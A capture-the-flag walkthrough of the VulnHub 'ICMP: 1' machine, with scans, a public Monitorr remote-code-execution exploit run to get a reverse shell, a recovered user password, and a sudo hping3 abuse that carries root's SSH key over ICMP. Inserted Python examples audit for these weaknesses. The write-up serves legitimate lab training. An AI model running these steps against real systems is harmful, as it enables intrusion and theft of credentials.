ICMP
Author: jason_huawen
Target machine information
Name: ICMP: 1
URL:
https://www.vulnhub.com/entry/icmp-1,633/
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.79.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:9a:82:57 1 60 PCS Systemtechnik GmbH
192.168.56.216 08:00:27:c7:4a:d1 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.216.
Nmap scan
┌──(kali㉿kali)-[~/Vulnhub]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.216 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-24 02:40 EST
Nmap scan report for localhost (192.168.56.216)
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 de:b5:23:89:bb:9f:d4:1a:b5:04:53:d0:b7:5c:b0:3f (RSA)
| 256 16:09:14:ea:b9:fa:17:e9:45:39:5e:3b:b4:fd:11:0a (ECDSA)
|_ 256 9f:66:5e:71:b9:12:5d:ed:70:5a:4f:5a:8d:0d:65:d5 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:C7:4A:D1 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.61 seconds
The Nmap scan shows that the target host has two open ports: 22 (SSH) and 80 (HTTP).
Get Access
┌──(kali㉿kali)-[~/Vulnhub]
└─$ curl http://192.168.56.216
Requesting port 80 on the target host with curl returns no content. In a browser, however, a request to port 80 is automatically redirected to http://192.168.56.216/mon
┌──(kali㉿kali)-[~/Vulnhub]
└─$ nikto -h http://192.168.56.216
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.216
+ Target Hostname: 192.168.56.216
+ Target Port: 80
+ Start Time: 2022-11-24 02:47:47 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Root page / redirects to: /mon
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7915 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2022-11-24 02:48:38 (GMT-5) (51 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
*********************************************************************
Portions of the server's headers (Apache/2.4.38) are not in
the Nikto 2.1.6 database or are newer than the known string. Would you like
to submit this information (*no server specific data*) to CIRT.net
for a Nikto update (or you may email to sullo@cirt.net) (y/n)?
┌──(kali㉿kali)-[~/Vulnhub]
└─$ gobuster dir -u http://192.168.56.216 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.216
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/11/24 02:48:54 Starting gobuster in directory enumeration mode
===============================================================
/mon (Status: 301) [Size: 314] [--> http://192.168.56.216/mon/]
/server-status (Status: 403) [Size: 279]
Progress: 220102 / 220561 (99.79%)
===============================================================
2022/11/24 02:49:23 Finished
===============================================================
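Neither nikto nor gobuster found any new directories.
However, the returned page content reveals the CMS type and version, Monitorr 1.7.6m. A searchsploit query shows that there is in fact a matching remote code execution vulnerability: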
┌──(kali㉿kali)-[~/Vulnhub]
└─$ searchsploit Monitorr
-------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------------- ---------------------------------
Monitorr 1.7.6m - Authorization Bypass | php/webapps/48981.py
Monitorr 1.7.6m - Remote Code Execution (Unauthenticated) | php/webapps/48980.py
-------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ searchsploit -m php/webapps/48980.py
Exploit: Monitorr 1.7.6m - Remote Code Execution (Unauthenticated)
URL: https://www.exploit-db.com/exploits/48980
Path: /usr/share/exploitdb/exploits/php/webapps/48980.py
File Type: Python script, ASCII text executable, with very long lines (434)
Copied to: /home/kali/Vulnhub/ICMP/48980.py
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ ls
48980.py nmap_full_scan
Copy the exploit code to the working directory and run it; the reverse shell from the target host is successfully received on Kali Linux:
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ python 48980.py http://192.168.56.216/mon 192.168.56.206 5555
A shell script should be uploaded. Now we try to execute it
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.216] 37470
bash: cannot set terminal process group (536): Inappropriate ioctl for device
bash: no job control in this shell
www-data@icmp:/var/www/html/mon/assets/data/usrimg$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@icmp:/var/www/html/mon/assets/data/usrimg$
www-data@icmp:/home/fox$ ls -alh
ls -alh
total 20K
drwxr-xr-x 3 root root 4.0K Dec 3 2020 .
drwxr-xr-x 3 root root 4.0K Dec 3 2020 ..
lrwxrwxrwx 1 root root 9 Dec 3 2020 .bash_history -> /dev/null
drwx--x--x 2 fox fox 4.0K Dec 3 2020 devel
-rw-r--r-- 1 fox fox 33 Dec 3 2020 local.txt
-rw-r--r-- 1 root root 78 Dec 3 2020 reminder
www-data@icmp:/home/fox$ cat local.txt
cat local.txt
c9db6c88939a2ae091c431a45fb1e59c
www-data@icmp:/home/fox$ cat reminder
cat reminder
crypt with crypt.php: done, it works
work on decrypt with crypt.php: howto?!?
www-data@icmp:/home/fox$ cd devel
cd devel
www-data@icmp:/home/fox/devel$ ls -alh
ls -alh
ls: cannot open directory '.': Permission denied
www-data@icmp:/home/fox/devel$ cd ..
cd ..
www-data@icmp:/home/fox$
www-data@icmp:/home/fox$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
sudo: no tty present and no askpass program specified
www-data@icmp:/home/fox$ find / -type f -perm -4000 2>/dev/null
find / -type f -perm -4000 2>/dev/null
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/fusermount
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/umount
/usr/bin/su
/usr/bin/sudo
/usr/bin/chfn
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
www-data@icmp:/home/fox$
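Privilege escalation
I tried for a long time, looking for various vulnerabilities or misconfigurations, without success, and I kept feeling that the reminder hint left by the author had to be useful. At first I thought crypt.php was in some other directory; it is actually in the devel directory. Although there is no permission to enter the devel directory, based on the author's hint the content of crypt.php can still be viewed: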
www-data@icmp:/home/fox$ ls -alh devel/crypt.php
ls -alh devel/crypt.php
-rw-r--r-- 1 fox fox 56 Dec 3 2020 devel/crypt.php
www-data@icmp:/home/fox$ ls -alh devel
ls -alh devel
ls: cannot open directory 'devel': Permission denied
www-data@icmp:/home/fox$ ls -alhd devel
ls -alhd devel
drwx--x--x 2 fox fox 4.0K Dec 3 2020 devel
www-data@icmp:/home/fox$
This gives us fox's password!
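The listing above shows devel as drwx--x--x: other users can traverse the directory but not list it, so a world-readable file inside it can still be opened by anyone who knows its name. The following added example (not part of the original write-up) audits a tree for that combination; the function names and the temporary sample directory are constructed for illustration.

```python
import os
import stat
import tempfile

def exposed_files(root):
    """Return (path, dir_mode, file_mode) for regular files that 'other' can read
    inside directories that 'other' can traverse (o+x) but not list (no o+r).
    Only mode bits are inspected; parent-directory traversal is not checked."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        dmode = os.stat(dirpath).st_mode
        search_only = bool(dmode & stat.S_IXOTH) and not (dmode & stat.S_IROTH)
        if not search_only:
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            fmode = os.lstat(path).st_mode
            if stat.S_ISREG(fmode) and fmode & stat.S_IROTH:
                findings.append((path, stat.filemode(dmode), stat.filemode(fmode)))
    return findings

def build_sample_home():
    """Constructed sample mirroring the listing: home 0755, devel 0711, crypt.php 0644."""
    home = tempfile.mkdtemp(prefix="sample-home-")
    devel = os.path.join(home, "devel")
    os.mkdir(devel)
    secret = os.path.join(devel, "crypt.php")
    with open(secret, "w") as fh:
        fh.write("<?php /* constructed placeholder, not the real file */ ?>\n")
    os.chmod(secret, 0o644)
    os.chmod(devel, 0o711)
    os.chmod(home, 0o755)
    return home

if __name__ == "__main__":
    for path, dmode, fmode in exposed_files(build_sample_home()):
        print(f"{path}: directory {dmode}, file {fmode}")
```

Tightening either side closes the gap: remove the execute bit for others on the directory, or make the file readable by its owner only.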
www-data@icmp:/home/fox$ su - fox
su - fox
Password: BUHNIJMONIBUVCYTTYVGBUHJNI
id
uid=1000(fox) gid=1000(fox) groups=1000(fox)
which python
/usr/bin/python
python -c 'import -c pty;pty.spawn("/bin/bash")'
File "<string>", line 1
import -c pty;pty.spawn("/bin/bash")
^
SyntaxError: invalid syntax
python -c 'import pty;pty.spawn("/bin/bash")'
fox@icmp:~$ ls
ls
devel local.txt reminder
fox@icmp:~$ cd devel
cd devel
fox@icmp:~/devel$ ls -alh
ls -alh
total 12K
drwx--x--x 2 fox fox 4.0K Dec 3 2020 .
drwxr-xr-x 3 root root 4.0K Dec 3 2020 ..
-rw-r--r-- 1 fox fox 56 Dec 3 2020 crypt.php
fox@icmp:~/devel$ sudo -l
sudo -l
[sudo] password for fox: BUHNIJMONIBUVCYTTYVGBUHJNI
Matching Defaults entries for fox on icmp:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fox may run the following commands on icmp:
(root) /usr/sbin/hping3 --icmp *
(root) /usr/bin/killall hping3
fox@icmp:~/devel$
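As an added example (not from the original write-up), the check below models why the first rule in the sudo -l output is too broad: sudoers compares the arguments as one joined string, so the trailing * also accepts further options such as --file. The fixed-argument rule and all function names are hypothetical.

```python
from fnmatch import fnmatchcase

# Rule lines copied from the sudo -l output above.
WEAK = """(root) /usr/sbin/hping3 --icmp *
(root) /usr/bin/killall hping3"""
# Hypothetical tightened rule: every argument fixed, no wildcard.
FIXED = "(root) /usr/sbin/hping3 --icmp -c 4 192.168.56.1"

def parse_rules(text):
    """Split each '(runas) command args' line into a (runas, command, args) tuple."""
    rules = []
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("("):
            runas, _, rest = line[1:].partition(") ")
            command, _, args = rest.partition(" ")
            rules.append((runas, command, args))
    return rules

def allows(rules, argv):
    """Approximate sudoers matching: the arguments are joined into one string
    and globbed, so '*' also matches spaces, slashes and further options."""
    joined = " ".join(argv[1:])
    for _, command, pattern in rules:
        # A rule without arguments permits any arguments.
        if argv[0] == command and (not pattern or fnmatchcase(joined, pattern)):
            return True
    return False

def wildcard_rules(rules):
    """Return the rules whose argument pattern contains a glob character."""
    return [r for r in rules if any(ch in r[2] for ch in "*?[")]

# The invocation used in this walkthrough, with the binary's full path.
FILE_READ = ["/usr/sbin/hping3", "--icmp", "127.0.0.1", "-d", "100",
             "--sign", "signature", "--file", "/root/.ssh/id_rsa"]

if __name__ == "__main__":
    for name, text in (("weak", WEAK), ("fixed", FIXED)):
        rules = parse_rules(text)
        print(name, "allows file-read invocation:", allows(rules, FILE_READ),
              "| wildcard rules:", len(wildcard_rules(rules)))
```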
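Running hping3 directly does not work, because it must be run in ICMP mode. However, the command can be used to read files, for example the root user's private key.
Open two terminals, one in listen mode and the other in send mode; in send mode, read the file /root/.ssh/id_rsa.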
fox@icmp:~$ sudo hping3 --icmp 127.0.0.1 --listen signature --safe
Warning: Unable to guess the output interface
hping3 listen mode
[main] memlockall(): Success
Warning: can't disable memory paging!
-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----
$ sudo hping3 --icmp 127.0.0.1 -d 100 --sign signature --file /root/.ssh/id_rsa
HPING 127.0.0.1 (lo 127.0.0.1): icmp mode set, 28 headers + 100 data bytes
[main] memlockall(): Success
Warning: can't disable memory paging!
len=128 ip=127.0.0.1 ttl=64 id=47727 icmp_seq=0 rtt=5.6 ms
len=128 ip=127.0.0.1 ttl=64 id=47896 icmp_seq=1 rtt=4.9 ms
len=128 ip=127.0.0.1 ttl=64 id=47903 icmp_seq=2 rtt=5.5 ms
len=128 ip=127.0.0.1 ttl=64 id=47938 icmp_seq=3 rtt=4.2 ms
len=128 ip=127.0.0.1 ttl=64 id=48082 icmp_seq=4 rtt=4.1 ms
len=128 ip=127.0.0.1 ttl=64 id=48244 icmp_seq=5 rtt=3.7 ms
len=128 ip=127.0.0.1 ttl=64 id=48407 icmp_seq=6 rtt=3.5 ms
len=128 ip=127.0.0.1 ttl=64 id=48646 icmp_seq=7 rtt=3.7 ms
len=128 ip=127.0.0.1 ttl=64 id=48792 icmp_seq=8 rtt=3.4 ms
len=128 ip=127.0.0.1 ttl=64 id=49003 icmp_seq=9 rtt=3.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49225 icmp_seq=10 rtt=2.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49238 icmp_seq=11 rtt=1.1 ms
len=128 ip=127.0.0.1 ttl=64 id=49484 icmp_seq=12 rtt=1.4 ms
len=128 ip=127.0.0.1 ttl=64 id=49529 icmp_seq=13 rtt=7.9 ms
len=128 ip=127.0.0.1 ttl=64 id=49592 icmp_seq=14 rtt=7.3 ms
You may need to specify -d, that is, the data size; otherwise nothing is received.
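A defender's view of the transfer above, as an added example that is not part of the original write-up: ICMP echo requests normally carry fixed padding, so text-heavy payloads or PEM headers inside them stand out. The packets are constructed in the code, and the payload layout (signature string followed by file text) is an assumption.

```python
import struct

PEM_MARKER = b"-----BEGIN"

def checksum(data):
    """RFC 1071 Internet checksum; a valid ICMP message sums to 0."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack(f"!{len(data) // 2}H", data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def build_echo(ident, seq, payload):
    """Build an ICMP echo request (type 8, code 0) for the constructed samples."""
    csum = checksum(struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload)
    return struct.pack("!BBHHH", 8, 0, csum, ident, seq) + payload

def classify(icmp):
    """Return the reasons an ICMP message looks like a data carrier, if any."""
    if len(icmp) < 8:
        return ["truncated"]
    if icmp[0] != 8:            # only echo requests are inspected here
        return []
    if checksum(icmp) != 0:
        return ["bad-checksum"]
    payload, reasons = icmp[8:], []
    if PEM_MARKER in payload:
        reasons.append("pem-marker")
    text = sum(32 <= b < 127 or b in (9, 10, 13) for b in payload)
    if len(payload) >= 32 and text / len(payload) > 0.9:
        reasons.append("mostly-text")
    return reasons

def samples():
    """Constructed packets: ping-style padding versus a 100-byte text payload."""
    padding = bytes(16) + bytes(range(0x10, 0x38))
    # Assumed layout: signature string first, then file text (filler, not a real key).
    carrier = b"signature" + b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + b"A" * 55
    return build_echo(1, 0, padding), build_echo(2, 0, carrier)

if __name__ == "__main__":
    for name, pkt in zip(("padding", "carrier"), samples()):
        print(name, len(pkt) - 8, "data bytes ->", classify(pkt) or "ok")
```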
This way we have read the root user's private key. Create a file locally on Kali Linux, using the content output by hping3 above as the private key.
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ >....[key body omitted]-----END OPENSSH PRIVATE KEY-----" > isa_id
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ cat isa_id
-----BEGIN OPENSSH PRIVATE KEY-----
[key body omitted]
-----END OPENSSH PRIVATE KEY-----
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ chmod 400 isa_id
┌──(kali㉿kali)-[~/Vulnhub/ICMP]
└─$ ssh -i isa_id root@192.168.56.216
Linux icmp 4.19.0-11-amd64 #1 SMP Debian 4.19.146-1 (2020-09-17) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
root@icmp:~# id
uid=0(root) gid=0(root) groups=0(root)
root@icmp:~# cd /root
root@icmp:~# ls
proof.txt
root@icmp:~# cat proof.txt
9377e773846aeabb51b37155e15cf638
root@icmp:~#
Privilege escalation successful!
From: https://www.cnblogs.com/jason-huawen/p/16922727.html